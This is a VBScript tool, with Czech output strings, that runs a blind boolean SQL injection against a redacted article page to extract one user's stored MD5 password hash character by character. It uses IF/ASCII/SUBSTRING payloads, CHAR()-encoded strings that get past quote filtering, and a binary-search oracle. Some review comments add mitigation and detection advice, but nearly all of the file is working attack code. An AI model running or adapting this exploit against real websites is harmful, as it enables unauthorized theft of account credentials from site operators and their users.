Option Explicit
' The script recovers the password stored in the database for a given login.
' The password is stored as an MD5 hash. After obtaining the password, the MD5
' hash has to be computed from it three times: MD5(MD5(MD5($heslo))).
' The login is then carried out as follows:
' [link]
'
' NOTE(review): the value is read one character at a time through a boolean
' condition placed in a request parameter (see testCharVal). This only works if
' the server evaluates that parameter as SQL, so the server-side fix is a
' parameterized query plus strict integer validation of the id.

' Number of characters to recover; 32 is the length of a hex-encoded MD5 digest.
Const passwordLength = 32
' Article id requested when the tested condition is true, and the text
' expected in that article's response body.
Const articleTrueId = 174
Const articleTrueText = "WWWhack"
' Article id requested when the tested condition is false, and the text
' expected in that article's response body.
Const articleFalseId = 171
Const articleFalseText = "Nslookup"
' Script-wide state, assigned in Main: the script's file name and the login
' taken from the command line.
Dim scriptName, login
Main
' Renders a string as a SQL expression of the form CONCAT(CHAR(n),CHAR(n),...),
' with one CHAR() term per input character holding its Asc() code.
' The result contains no quote characters. For a defender this means that
' filtering or escaping quotes does not neutralise such input; only
' parameterized queries and type validation do.
' An empty input yields "CONCAT()".
Function charCodeSeq(ByVal chars)
    Dim pos, total, parts()
    total = Len(chars)
    If total = 0 Then
        charCodeSeq = "CONCAT()"
        Exit Function
    End If
    ' One array slot per character, joined with commas at the end
    ReDim parts(total - 1)
    For pos = 1 To total
        parts(pos - 1) = "CHAR(" & CStr(Asc(Mid(chars, pos, 1))) & ")"
    Next
    charCodeSeq = "CONCAT(" & Join(parts, ",") & ")"
End Function
' Asks the server one yes/no question about a single character of the stored
' value: is the character code at position `offset` related to `value` by
' `operator` ("<", ">" or "=")?
' Returns True when the response contains articleTrueText, False when it
' contains articleFalseText, and raises an error otherwise.
'
' NOTE(review): presumably the target page places this parameter into a SQL
' query without parameterization; the URL is redacted on the page, so this
' cannot be confirmed here. Server-side mitigation: bind the id as an integer
' parameter and reject non-numeric values. Detection: an id parameter that
' contains IF(, ASCII( or SUBSTRING(, repeated in long bursts from one client.
Function testCharVal(ByVal offset,ByVal operator,ByVal value)
Dim XHR, t, v, url
Set XHR = CreateObject("MSXML2.XMLHTTP")
' t: comparison of one character code of users.heslo for the given login;
' the login is upper-cased and passed through charCodeSeq.
t = "ASCII(SUBSTRING((SELECT heslo FROM users WHERE UPPER(login) = " & charCodeSeq(UCase(login)) & ")," & Cstr(offset) & ",1)) " & operator & " " & Cstr(value)
' v: resolves to articleTrueId when t holds, otherwise to articleFalseId.
v = "IF(" & t & "," & CStr(articleTrueId) & "," & CStr(articleFalseId) & ")"
' The expression is URL-escaped and appended to the (redacted) base URL.
url = "[link]" & Escape(v)
' Synchronous GET (third argument False): Send blocks until the response arrives.
XHR.Open "GET",url,False
XHR.Send NULL
' The answer is read from which article text appears in the response body.
If InStr(XHR.responseText,articleTrueText) Then
testCharVal = True
ElseIf InStr(XHR.responseText,articleFalseText) Then
testCharVal = False
Else
' Neither marker text was found; the message means "Unexpected server response".
Err.Raise 1, scriptName & ".testCharVal", "Nepredvidana odpoved serveru"
End if
End Function
' Binary search over the code range l..r for the character at position
' `offset`, using testCharVal as the comparison oracle.
' Each step probes "<", then ">", then "=" against the midpoint, in that order.
' Returns the character as a string when the "=" probe succeeds, or the
' Boolean False when the range is exhausted or all three probes answer False.
Function findChar(ByVal offset,Byval l,ByVal r)
    Dim pivot, c
    ' Default result; only replaced when the "=" probe confirms a value
    findChar = False
    Do Until l > r
        pivot = (l + r) \ 2
        If testCharVal(offset, "<", pivot) Then
            r = pivot - 1
        Else
            If testCharVal(offset, ">", pivot) Then
                l = pivot + 1
            Else
                ' Neither below nor above: confirm equality, then stop either way
                If testCharVal(offset, "=", pivot) Then findChar = Chr(pivot)
                Exit Function
            End If
        End If
    Loop
End Function
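' Entry point. Expects exactly one command-line argument (the login), then
' recovers passwordLength characters one by one with findChar and prints
' progress after each character. Stops at the first character that cannot be
' determined.
Sub Main()
    Dim i, r, password

    ' Assign the script name before the argument check: the usage message
    ' prints it, and it was previously still empty at that point.
    scriptName = WScript.ScriptName
    If WScript.arguments.length <> 1 Then
        WScript.Echo "Syntaxe: " & scriptName & " login"
        WScript.Quit 1
    End If

    login = WScript.arguments(0)
    password = ""
    WScript.Echo "Login: " & login
    WScript.Echo "Delka hesla: " & passwordLength
    WScript.Echo ""

    For i = 1 To passwordLength
        ' Search the full single-byte code range for position i
        r = findChar(i, 0, 255)
        ' findChar returns a string on success and the Boolean False on failure
        If VarType(r) = vbString Then
            WScript.Echo "Pocet zjistenych znaku " & i & " z " & passwordLength
            password = password & r
            ' Pad the positions not yet recovered with "?"
            WScript.Echo "Heslo: " & password & String(passwordLength - i, "?")
        Else
            WScript.Echo "Nepodarilo se zjistit znak"
            Exit Sub
        End If
    Next
End Sub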